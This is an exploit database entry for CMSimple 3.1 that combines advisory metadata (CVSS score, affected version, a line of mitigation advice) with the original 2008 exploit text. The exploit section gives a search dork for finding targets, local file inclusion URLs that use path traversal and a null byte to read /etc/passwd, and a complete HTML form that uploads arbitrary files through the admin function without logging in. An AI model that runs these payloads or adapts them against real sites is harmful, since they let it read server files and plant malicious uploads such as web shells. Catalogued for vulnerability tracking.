CMSimple 3.1 Local File Inclusion / Arbitrary File Upload

vendor:

CMSimple

by:

irk4z

7.5

CVSS

HIGH

Local File Inclusion / Arbitrary File Upload

CWE

Product Name: CMSimple

Affected Version From: 3.1

Affected Version To: 3.1

Patch Exists: YES

Related CWE: N/A

CPE: a:cmsimple:cmsimple:3.1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

CMSimple 3.1 Local File Inclusion / Arbitrary File Upload

CMSimple 3.1 is vulnerable to Local File Inclusion and Arbitrary File Upload. An attacker can exploit this vulnerability to gain access to sensitive information and upload malicious files on the server.

Mitigation:

Upgrade to the latest version of CMSimple 3.1 and apply the latest security patches.

Source

Exploit-DB raw data:

<pre>
#
# CMSimple 3.1 Local File Inclusion / Arbitrary File Upload
# download: http://www.cmsimple.org/?Downloads
# dork: "Powered by CMSimple"
#
# author: irk4z@yahoo.pl
# homepage: http://irk4z.wordpress.com
#


Local File Inclusion :

	http://[host]/[path]/index.php?sl=[file]%00
	http://[host]/[path]/index.php?sl=../../../../../../../etc/passwd%00


Arbitrary File Upload (into http://[host]/[path]/downloads/ ):
</pre>
<form method="POST" enctype="multipart/form-data" action="http://[host]/[path]/index.php?sl=../adm&adm=1" >
<input type="file" class="file" name="downloads" size="30">
<input type="hidden" name="action" value="upload">
<input type="hidden" name="function" value="downloads">
<input type="submit" class="submit" value="Upload">
</form>

# milw0rm.com [2008-05-31]